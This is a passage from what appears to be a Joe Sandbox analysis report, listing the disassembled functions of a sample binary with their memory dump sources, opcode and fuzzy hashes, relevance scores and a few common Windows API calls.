                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2325560087-0
                                                                                                                    • Opcode ID: 249b11b8dd4f329a77f82acd093df45a6dae5fd0c6a6c1b5797fe8ba3a780042
                                                                                                                    • Instruction ID: 70ed5312ece60366bb4ace3fa5c909019b257508b6540207cd6c1a67daae2788
                                                                                                                    • Opcode Fuzzy Hash: 249b11b8dd4f329a77f82acd093df45a6dae5fd0c6a6c1b5797fe8ba3a780042
                                                                                                                    • Instruction Fuzzy Hash: 10518F71A006098FDF68CF94ED827AEBBF4FB58354F24953AD401EB250D374A904CB60
                                                                                                                    Function 0058B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: c642b09a551339af2c1b2e18d79f723ab458f2298ccda4b1c8135ff15202970e
                                                                                                                    • Instruction ID: f604b5b1063fe69dc87d12ab2a97c587e9b306bc044afdb577db762464f98c08
                                                                                                                    • Opcode Fuzzy Hash: c642b09a551339af2c1b2e18d79f723ab458f2298ccda4b1c8135ff15202970e
                                                                                                                    • Instruction Fuzzy Hash: 42F090B4E00A088FDB18DF18EC9AAD577F5FB69704F100295D905A3390C370B988DF64
                                                                                                                    Function 005840FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: gj
                                                                                                                    • API String ID: 0-4203073231
                                                                                                                    • Opcode ID: 6cea7dedd92b6e7aa753699dee272458678642165f0c8e9c8cfac070d21bc3ef
                                                                                                                    • Instruction ID: f226e6b8973c27b29d0f2e84d8b687510aa0ce15099317f4774f3ac029f293b9
                                                                                                                    • Opcode Fuzzy Hash: 6cea7dedd92b6e7aa753699dee272458678642165f0c8e9c8cfac070d21bc3ef
                                                                                                                    • Instruction Fuzzy Hash: C9C14776A183418FC354CF2AD88065AFBE1BFC8308F59892DE998E7311D734E945CB96
                                                                                                                    Function 0059F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0059F3A5), ref: 0059F9DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: 122432a596f9c3797668b07bf0d9e4fe2159c78b78ad529df7339f75f9d350aa
                                                                                                                    • Instruction ID: b63152d50a8210e1e76f24285b228865eaf8bf9e6f9eb1c5b1f312ad50852956
                                                                                                                    • Opcode Fuzzy Hash: 122432a596f9c3797668b07bf0d9e4fe2159c78b78ad529df7339f75f9d350aa
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Function 005AC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 54951025-0
                                                                                                                    • Opcode ID: 04066f76e72a5aaee02e4ca00463574b315b1238ab5e115411fe1db3e96a48fa
                                                                                                                    • Instruction ID: 4e5cb2b5701e85eaacc7d84eb57eebb1aae2f6fc40a8e033906c9b73d0635f80
                                                                                                                    • Opcode Fuzzy Hash: 04066f76e72a5aaee02e4ca00463574b315b1238ab5e115411fe1db3e96a48fa
                                                                                                                    • Instruction Fuzzy Hash: D6A012301011008BC3448F345E48208369C552018070402155004C4020EE205154B600
                                                                                                                    Function 005962CA Relevance: .8, Instructions: 829COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction ID: d31c937cde15fee2ad6403a25f6fdecd6b2ab42bde0ddf0981a3dd8467433899
                                                                                                                    • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                    • Instruction Fuzzy Hash: 0962B0716047859FCF25CF28C4906B9BFE1BF95304F08896EE8AA8B346D734E949CB11
                                                                                                                    Function 005977EF Relevance: .8, Instructions: 817COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction ID: 4f18828618ae1adf91134b7f9713fcb26e1ae7875537691a9d106ca713ce15a1
                                                                                                                    • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                    • Instruction Fuzzy Hash: 2862B3716187498FCF19CF28C8845B9BFE1BF99304F18896EE89A8B346D730E945CB15
                                                                                                                    Function 0058F461 Relevance: .7, Instructions: 694COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction ID: 35663a6cfc03038542aa4b8de610f301463fb9bb5d466d40150c5672865c15a2
                                                                                                                    • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                    • Instruction Fuzzy Hash: DE524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                    Function 00597153 Relevance: .5, Instructions: 536COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d51c389fcb8aa210f9a9341c043ca2297032cd5cbd18897cf136721e9040e498
                                                                                                                    • Instruction ID: 4bcaceaea3d60789bd6e1532b25db35709eb0167b27ad902f52fcf83a7deca0d
                                                                                                                    • Opcode Fuzzy Hash: d51c389fcb8aa210f9a9341c043ca2297032cd5cbd18897cf136721e9040e498
                                                                                                                    • Instruction Fuzzy Hash: 6912C4B162870A9FCB18CF28C494A79BBE1FF98304F14492EE996C7781E334E595CB45
                                                                                                                    Function 0058C426 Relevance: .5, Instructions: 454COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4df5e762a33d87750cfe4313f7f1d89bb288ed97069bcf669b80f0869deeb8a
                                                                                                                    • Instruction ID: 8de3bc87b2fc22851a4ba02d293eac528dc0a13577c0c72d1a167e5ce90a8cd7
                                                                                                                    • Opcode Fuzzy Hash: e4df5e762a33d87750cfe4313f7f1d89bb288ed97069bcf669b80f0869deeb8a
                                                                                                                    • Instruction Fuzzy Hash: CEF19D716083058FC718EF29C48862ABFE5FFCA314F144A6EF985E7256D630E945CB62
                                                                                                                    Function 00596CDC Relevance: .3, Instructions: 343COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: dd56dd6f552ae16af4eee0e97a8e6034bbca11515ad18326fe8b4f30caeea7d2
                                                                                                                    • Instruction ID: 3e5d01f73b0258cf8cdc5da54366ca3b13de7189fe060e29d6220a3d821605b0
                                                                                                                    • Opcode Fuzzy Hash: dd56dd6f552ae16af4eee0e97a8e6034bbca11515ad18326fe8b4f30caeea7d2
                                                                                                                    • Instruction Fuzzy Hash: DED1A4B16083458FDF14DF28C84475BBFE5BF89308F08496EE8999B242D774EA09CB56
                                                                                                                    Function 0058E9B7 Relevance: .3, Instructions: 320COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a4161ad7627cf83b398d8f47988f7ee256385291905c0d22a219c6c290391b12
                                                                                                                    • Instruction ID: 8163874a487b1344f780f39afa8ecdce08497dd9fefc42276576b6afab6cb181
                                                                                                                    • Opcode Fuzzy Hash: a4161ad7627cf83b398d8f47988f7ee256385291905c0d22a219c6c290391b12
                                                                                                                    • Instruction Fuzzy Hash: 74E159755083948FC304CF69D89086ABFF0BF9A300F49095EF9D497352C235EA59EBA2
                                                                                                                    Function 00594088 Relevance: .3, Instructions: 270COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction ID: 5ca7263fc8a412bfe9117a574a4ea361c142686d75e6e85586477d3e3a65c747
                                                                                                                    • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                    • Instruction Fuzzy Hash: 129149B02003469BDF24EB64D895FBE7FD5FB90300F10092DE99697282EA649946CB52
                                                                                                                    Function 005943BF Relevance: .2, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction ID: bf8bd25d0b13cbf87138d4b8983368f93ce77cab506d3783f4871507861b1eb9
                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: 8C812BB13043465BEF24DE68C895FBD3FD4BB95304F044D2DE98A8B282DA648D878F52
                                                                                                                    Function 005A51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6567fc4e92117604f8d138ed684821eaa3adc0667de7fc47dcb28a9e85dbf25a
                                                                                                                    • Instruction ID: efd313ebcf6d13ca7950e2f51a3759c6cdb306467b391f3bd12e652a4f2fec7c
                                                                                                                    • Opcode Fuzzy Hash: 6567fc4e92117604f8d138ed684821eaa3adc0667de7fc47dcb28a9e85dbf25a
                                                                                                                    • Instruction Fuzzy Hash: B9617979600F0966DE389E686899FBE2F94FFC7340F540D1AE543DF282F6A1DD428611
                                                                                                                    Function 005A4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction ID: 3dcafcf4bd0a0a6285830f6d8f69e35d530f55b60ef3775adb0730186d68d75f
                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction Fuzzy Hash: F9513461600E499BDF3446A8855EFBF6FC5BB83300F185819E983CB282F645EE05C7A1
                                                                                                                    Function 0058EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: df12e486fb4e75c5d4a0ea4449144d5ac007fc1d3e5d456acc168b994c37ce39
                                                                                                                    • Instruction ID: 1f98c4c46bb462fafc0098c58f1a42aad469680c48dc8c795952ddf50328d876
                                                                                                                    • Opcode Fuzzy Hash: df12e486fb4e75c5d4a0ea4449144d5ac007fc1d3e5d456acc168b994c37ce39
                                                                                                                    • Instruction Fuzzy Hash: AF51EA355083D58FD701EF29C1484AEBFE0BEDE314F4909ADE8D96B243D221D64ACB62
                                                                                                                    Function 005900B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
